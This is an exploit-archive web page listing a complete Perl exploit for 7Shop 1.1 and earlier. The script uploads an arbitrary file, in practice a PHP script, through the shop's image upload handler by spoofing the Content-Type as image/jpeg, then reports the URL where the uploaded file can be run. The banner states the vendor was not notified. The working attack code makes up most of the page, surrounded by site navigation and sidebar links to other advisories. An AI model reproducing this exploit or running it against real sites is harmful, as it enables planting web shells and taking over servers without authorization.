Register | Forget Password | Login
Search :
SecurityReason

News

Search

SecurityAlert

About SecurityAlert

ExploitAlert

SecurityReason Research

WLB

WLB Database

Send to WLB

About WLB

RSS

News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP

Corporate

Contact

About us

Services

SecurePHP

Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Details : ExploitAlert

  Topic : 7Shop <= 1.1 Remote Arbitrary File Upload Exploit
  ExploitAlert : 5016
  Milw0rm ID : 6866
  Credit : t0pP8uZz
  Date : 29.10.2008

  Download

  Exploit Code :  

#!/usr/bin/perl

use warnings;
use strict;
use LWP::UserAgent;
use HTTP::Request::Common;

my $fname = rand(1000) . ".php"; # int.. yes i know PU!

print <<INTRO;
+++++++++++++++++++++++++++++++++++++++++++++++++++++
+ 7Shop <= 1.1 Remote Arbitrary File Upload +
+ [Content-Type] -> Spoofing +
+ Discovered && Coded By: t0pP8uZz +
+ +
+ Contact IRC: irc.rizon.net #sectalk +
+ Vendor not notified! Later versions maybe vuln! +
+ +
+ +
+ Script Download: http://7shop.de +
+++++++++++++++++++++++++++++++++++++++++++++++++++++
INTRO

print "\nEnter URL(ie: http://site.com/shop): ";
chomp(my $url=<STDIN>);

print "\nEnter File Path(path to local file to upload): ";
chomp(my $file=<STDIN>);

my $ua = LWP::UserAgent->new;
my $re = $ua->request(POST $url.'/includes/imageupload.php',
Content_Type => 'form-data',
Content => [ img1 => [ $file, $fname,
Content_Type => 'image/jpeg' ], ] );

die "HTTP POST Failed!" unless $re->is_success;

if($re->content =~ /File is valid/) {

print "File successfully uploaded! Access your file here: " . $url .
"/images/artikel/" . $fname . "\n"; # say()? nah you havent got perl510
yet. have you!
}
elsif($re->content =~ /The requested URL/) { # apache debug only

print "File Upload Failed! The requested target was not running a
vulnerable version of 7shop!\n";
}
else {

print "File Upload Failed! target vulnerable, but upload failed.. try
changing filename.\n";
}
exit;



Alert

Microsoft VISTA TCP/IP stack buffer overflow

high- 2008-11-27

Microsoft Device IO Control wrapped by the iphlpapi.dll API shipping with Windows Vista 32 bit and 64 bit contains a possibly exploitable, buffer overflow corrupting kernel memory.

Apache rss

» Apache Tomcat information
   disclosure

» Apache Tomcat <=
   6.0.18 UTF8 Directory
   Traversal Vulnerability

» Apache Tomcat information
   disclosure vulnerability

» Apache Tomcat XSS
   vulnerability

PHP rss

» PHP 5.2.6 SAPI
   php_getuid() overload

» PHP
   ZipArchive::extractTo()
   Directory Traversal
   Vulnerability

» PHP 5.2.6 dba_replace()
   destroying file

» PHP 5.2.6 (error_log)
   safe_mode bypass

Copyright © SecurityReason. All Rights Reserved.